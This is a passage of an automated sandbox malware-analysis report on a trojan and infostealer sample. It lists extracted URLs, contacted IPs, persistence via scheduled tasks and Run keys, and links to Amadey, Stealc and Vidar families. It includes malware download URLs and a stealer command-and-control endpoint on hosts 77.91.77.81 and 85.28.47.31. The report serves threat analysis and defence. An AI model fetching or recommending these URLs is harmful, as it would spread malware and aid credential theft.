                          https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=efirefox.exe, 0000000E.00000002.2427010220.00000244DD650000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000003.2381619693.00000244DD66D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.2427010220.00000244DD682000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.2442562466.00000244DF170000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000003.2393570102.00000244DD680000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.2410452799.00000244DD5A4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.2410452799.00000244DD5A0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://screenshots.firefox.comfirefox.exe, 00000012.00000003.2740267659.000001E957740000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsfirefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.youtube.comfirefox.exe, 00000012.00000003.2741671716.000001E956945000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2804070755.000001E956945000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://77.91.77.81/cost/go.exe00Start4http://77.91.77.81/soka/random.exe00Start2CURRENTRENTs---JKEBFfile.exe, 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          http://85.28.47.31v4ddf12fb51.exe, 0000002F.00000002.2934283237.0000000000752000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://completion.amazon.com/search/complete?q=firefox.exe, 00000012.00000003.2479180713.000001E95A52A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2475465600.000001E95A300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2479515609.000001E95A54B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2478451218.000001E95A508000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://ads.stickyadstv.com/firefox-etpfirefox.exe, 00000012.00000003.2607471320.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3058630463.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2691821176.000001E95AEFD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2692741855.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://xhr.spec.whatwg.org/#sync-warningfirefox.exe, 00000012.00000003.2875877920.000001E95D258000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2869503726.000001E95DC88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://e.mail.ru/cgi-bin/sentmsg?mailto=%sfirefox.exe, 00000012.00000003.2738811203.000001E959B97000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.amazon.com/exec/obidos/external-search/firefox.exe, 00000012.00000003.2607471320.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2479180713.000001E95A52A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2475465600.000001E95A300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3058630463.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2479515609.000001E95A54B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2478451218.000001E95A508000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2692741855.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://profiler.firefox.com/firefox.exe, 00000012.00000003.2739028393.000001E959B5D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.msn.comfirefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://firefox-api-proxy.cdn.mozilla.net/firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.htmlfirefox.exe, 00000012.00000003.2696026363.000001E95C7D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2859795399.000001E95C7D9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://85.28.47.31/8405906461a5200c/sqlite3.dlljfile.exe, 00000000.00000002.2525036759.0000000000841000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 16%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.urwpp.deDPleasefirefox.exe, 00000012.00000003.3197786148.000001E95C524000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://github.com/mozilla-services/screenshotsfirefox.exe, 00000012.00000003.2479180713.000001E95A52A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2475465600.000001E95A300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2478451218.000001E95A508000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.reddit.com/firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2740136811.000001E95775B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.zhongyicts.com.cnfirefox.exe, 00000012.00000003.3197786148.000001E95C39F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://youtube.com/firefox.exe, 00000012.00000003.2825320343.000001E95CBDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2593357627.000001E95CBDD000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabfirefox.exe, 00000012.00000003.2875877920.000001E95D258000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2869503726.000001E95DC88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.mozilla.com/en-US/blocklist/file.exe, file.exe, 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://85.28.47.31/5499d72b3a3e55be.phpv4ddf12fb51.exe, 0000002F.00000002.2934283237.00000000007C1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 18%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingfirefox.exe, 00000012.00000003.2875877920.000001E95D258000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2869503726.000001E95DC88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://85.28.47.31/5499d72b3a3e55be.phpx4ddf12fb51.exe, 0000002F.00000002.2934283237.000000000078D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 16%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifirefox.exe, 00000012.00000003.2742111843.000001E955CB5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://fpn.firefox.comfirefox.exe, 00000012.00000003.2740267659.000001E957740000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.rootca1.amazontrust.com/rootca1.crl0firefox.exe, 00000012.00000003.3083491145.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2594774383.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2885644894.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://exslt.org/dates-and-timesfirefox.exe, 00000012.00000003.2742111843.000001E955C81000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ocsp.rootca1.amazontrust.com0:firefox.exe, 00000012.00000003.3083491145.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2594774383.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2885644894.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://85.28.47.31/5499d72b3a3e55be.phphfile.exe, 00000000.00000002.2525036759.0000000000850000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 16%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          http://85.28.47.31/5499d72b3a3e55be.phpcfile.exe, 00000000.00000002.2525036759.0000000000850000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 19%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2331458680.000000002CFDC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.youtube.com/firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2740267659.000001E957730000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2740136811.000001E95775B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://en.wfirefox.exe, 00000012.00000003.3195359917.000001E957B3A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://85.28.47.31/s4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A49000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.carterandcone.comlfirefox.exe, 00000012.00000003.3197786148.000001E95C524000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://127.0.0.1:firefox.exe, 00000012.00000003.3085817538.000001E95A38D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://85.28.47.31/5499d72b3a3e55be.phpV4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A5F000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://www.google.com/chromecontent_new.js.22.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://85.28.47.31/nfile.exe, 00000000.00000002.2525036759.0000000000850000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYtfile.exe, 00000000.00000003.2331458680.000000002CFDC000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://amazon.comfirefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://static.adsafeprotected.com/firefox-etp-pixelfirefox.exe, 00000012.00000003.2607471320.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3058630463.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2691821176.000001E95AEFD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2692741855.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://smartblock.firefox.etp/facebook.svgfirefox.exe, 00000012.00000003.2607471320.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3058630463.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2692741855.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapturefirefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://spocs.getpocket.com/firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://77.91.77.81/cost/go.exeJcfile.exe, 00000000.00000002.2564756762.0000000026D03000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            		unknown
                            http://77.91.77.81/mine/amadka.exexfile.exe, 00000000.00000002.2525036759.0000000000850000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            		unknown
                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctafile.exe, 00000000.00000002.2564756762.0000000026CF2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2802529831.000001E95775B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2740136811.000001E95775B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2742111843.000001E955CB5000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://77.91.77.81/soka/random.exe:Rfile.exe, 00000000.00000002.2564756762.0000000026D03000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            		unknown
                            https://extensionworkshop.com/documentation/publish/self-distribution/firefox.exe, 00000012.00000003.2875877920.000001E95D258000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2869503726.000001E95DC88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://e.mail.ru/cgi-bin/sentmsg?mailto=%szwfirefox.exe, 00000012.00000003.3086335305.000001E959B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738887810.000001E959B86000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basfirefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://services.addons.mozilla.org/api/v4/addons/search/?guid=default-theme%40mozilla.org%2Caddons-firefox.exe, 00000012.00000003.2801528953.000001E9577AA000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://85.28.47.31/C4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A49000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://mail.google.com/mail/?extsrc=mailto&url=%sfirefox.exe, 00000012.00000003.2738811203.000001E959B97000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://screenshots.firefox.compfirefox.exe, 00000012.00000003.3085961974.000001E959BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2800500299.000001E959BBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738403683.000001E959BBE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            13.107.246.40
                            		unknownUnited States
                            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            85.28.47.31
                            		unknownRussian Federation
                            		31643GES-ASRUtrue
                            162.159.61.3
                            		unknownUnited States
                            		13335CLOUDFLARENETUSfalse
                            23.40.179.37
                            		unknownUnited States
                            		16625AKAMAI-ASUSfalse
                            142.250.184.228
                            		www.google.comUnited States
                            		15169GOOGLEUSfalse
                            34.120.208.123
                            		telemetry-incoming.r53-2.services.mozilla.comUnited States
                            		15169GOOGLEUSfalse
                            204.79.197.237
                            		unknownUnited States
                            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            172.253.62.84
                            		unknownUnited States
                            		15169GOOGLEUSfalse
                            216.58.206.46
                            		unknownUnited States
                            		15169GOOGLEUSfalse
                            142.251.167.84
                            		unknownUnited States
                            		15169GOOGLEUSfalse
                            239.255.255.250
                            		unknownReserved
                            		unknownunknownfalse
                            77.91.77.81
                            		unknownRussian Federation
                            		42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUfalse
                            142.250.186.142
                            		play.google.comUnited States
                            		15169GOOGLEUSfalse
                            34.160.144.191
                            		prod.content-signature-chains.prod.webservices.mozgcp.netUnited States
                            		2686ATGS-MMD-ASUSfalse
                            152.195.19.97
                            		unknownUnited States
                            		15133EDGECASTUSfalse
                            77.91.77.82
                            		unknownRussian Federation
                            		42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUfalse
                            142.251.32.100
                            		unknownUnited States
                            		15169GOOGLEUSfalse
                            18.66.102.82
                            		services.addons.mozilla.orgUnited States
                            		3MIT-GATEWAYSUSfalse
                            172.64.41.3
                            		chrome.cloudflare-dns.comUnited States
                            		13335CLOUDFLARENETUSfalse
                            64.233.180.84
                            		unknownUnited States
                            		15169GOOGLEUSfalse
                            94.245.104.56
                            		ssl.bingadsedgeextension-prod-europe.azurewebsites.netUnited Kingdom
                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            142.250.65.193
                            		unknownUnited States
                            		15169GOOGLEUSfalse
                            34.149.100.209
                            		prod.remote-settings.prod.webservices.mozgcp.netUnited States
                            		2686ATGS-MMD-ASUSfalse
                            34.107.221.82
                            		prod.detectportal.prod.cloudops.mozgcp.netUnited States
                            		15169GOOGLEUSfalse
                            35.244.181.201
                            		prod.balrog.prod.cloudops.mozgcp.netUnited States
                            		15169GOOGLEUSfalse
                            35.190.72.216
                            		prod.classify-client.prod.webservices.mozgcp.netUnited States
                            		15169GOOGLEUSfalse
                            23.101.168.44
                            		unknownUnited States
                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            142.251.35.163
                            		unknownUnited States
                            		15169GOOGLEUSfalse

                            Private

                            IP
                            192.168.2.6
                            127.0.0.1

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1479814
                            Start date and time:2024-07-24 07:13:08 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 20m 28s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:52
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@137/254@82/30
                            EGA Information:
                            • Successful, ratio: 50%
                            HCA Information:
                            • Successful, ratio: 68%
                            • Number of executed functions: 79
                            • Number of non-executed functions: 198
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Max analysis timeout: 600s exceeded, the analysis took too long
                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 192.229.221.95, 93.184.221.240, 216.58.206.35, 142.250.186.110, 64.233.166.84, 34.104.35.123, 13.107.42.16, 13.107.21.239, 204.79.197.239, 142.250.186.78, 13.107.6.158, 2.19.126.152, 2.19.126.145, 108.177.15.84, 142.251.168.84, 142.250.185.67, 2.23.209.183, 2.23.209.186, 2.23.209.185, 2.23.209.181, 2.23.209.135, 2.23.209.189, 2.23.209.130, 2.23.209.182, 2.23.209.193, 23.32.185.164, 104.208.16.94, 216.58.206.74, 216.58.206.42, 142.250.181.234, 142.250.185.138, 142.250.186.106, 142.250.186.42, 172.217.23.106, 142.250.186.138, 172.217.16.202, 172.217.18.10, 142.250.184.202, 142.250.184.234, 216.58.212.170, 172.217.18.106, 142.250.186.170, 142.250.74.202, 142.250.185.74, 142.250.185.170, 142.250.185.234, 172.217.16.138, 142.250.186.74, 142.250.185.106, 142.250.185.202, 2.22.61.56, 2.22.61.59, 172.217.18.14, 20.189.173.22, 142.250.184.206, 172.217.23.99, 52.168.117.173, 20.189.173.21, 142.250.74.206, 13.89.179.12, 20.189.173.20, 152.199.19.161, 2.19.126.157, 2.19.126.155,
                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, a416.dscd.akamai.net, clientservices.googleapis.com, aus5.mozilla.org, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, a19.dscg10.akamai.net, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, update.googleapis.com, www.gstatic.com, l-0007.l-msedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com, www.bing.com, fs.microsoft.com, shavar.prod.mozaws.net, bingadsedgeextension-prod.trafficmanager.net, content-autofill.googleapis.com, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, edgedl.me.gvt1.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, clients.l.google.com, location.services.mozilla.com, a1847.dscd.akamai.net, cs9.wpc.v0cdn.
                            • Execution Graph export aborted for target RoamingCBGCBGCAFI.exe, PID 7952 because it is empty
                            • Execution Graph export aborted for target userGDHIIIIEHC.exe, PID 4860 because it is empty
                            • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size exceeded maximum capacity and may have missing network information.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtWriteVirtualMemory calls found.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            01:14:39API Interceptor2x Sleep call for process: WerFault.exe modified
                            01:15:03API Interceptor10333861x Sleep call for process: explorti.exe modified
                            01:15:04API Interceptor10405655x Sleep call for process: axplong.exe modified
                            07:14:36Task SchedulerRun new task: explorti path: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                            07:14:46Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                            07:15:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4ddf12fb51.exe C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe
                            07:15:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4ddf12fb51.exe C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            162.159.61.3file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                              file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                [SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.emlGet hashmaliciousUnknownBrowse
                                  [SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.emlGet hashmaliciousUnknownBrowse
                                    file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                      file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                        Bravo.1.0.8.x64-userinstaller.msiGet hashmaliciousUnknownBrowse
                                          file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                            0Zplp6OB04.exeGet hashmaliciousBabadedaBrowse
                                              BraveBrowserSetup-BRV030.exeGet hashmaliciousUnknownBrowse
                                                13.107.246.40Payment Transfer Receipt.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                • www.aib.gov.uk/
                                                NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                                                • 2s.gg/3zs
                                                PO_OCF 408.xlsGet hashmaliciousUnknownBrowse
                                                • 2s.gg/42Q
                                                06836722_218 Aluplast.docx.docGet hashmaliciousUnknownBrowse
                                                • 2s.gg/3zk
                                                Quotation.xlsGet hashmaliciousUnknownBrowse
                                                • 2s.gg/3zM
                                                85.28.47.31file.exeGet hashmaliciousStealcBrowse
                                                • 85.28.47.31/5499d72b3a3e55be.php
                                                file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                                • 85.28.47.31/5499d72b3a3e55be.php
                                                file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                                • 85.28.47.31/5499d72b3a3e55be.php
                                                file.exeGet hashmaliciousStealcBrowse
                                                • 85.28.47.31/5499d72b3a3e55be.php
                                                file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                • 85.28.47.31/5499d72b3a3e55be.php
                                                file.exeGet hashmaliciousStealcBrowse
                                                • 85.28.47.31/5499d72b3a3e55be.php
                                                file.exeGet hashmaliciousStealcBrowse
                                                • 85.28.47.31/5499d72b3a3e55be.php
                                                file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                • 85.28.47.31/5499d72b3a3e55be.php
                                                file.exeGet hashmaliciousStealcBrowse
                                                • 85.28.47.31/5499d72b3a3e55be.php
                                                file.exeGet hashmaliciousStealcBrowse
                                                • 85.28.47.31/5499d72b3a3e55be.php

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                example.orgfile.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                                • 93.184.215.14
                                                file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                                • 93.184.215.14
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 93.184.215.14
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 93.184.215.14
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 93.184.215.14
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 93.184.215.14
                                                file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                • 93.184.215.14
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 93.184.215.14
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 93.184.215.14
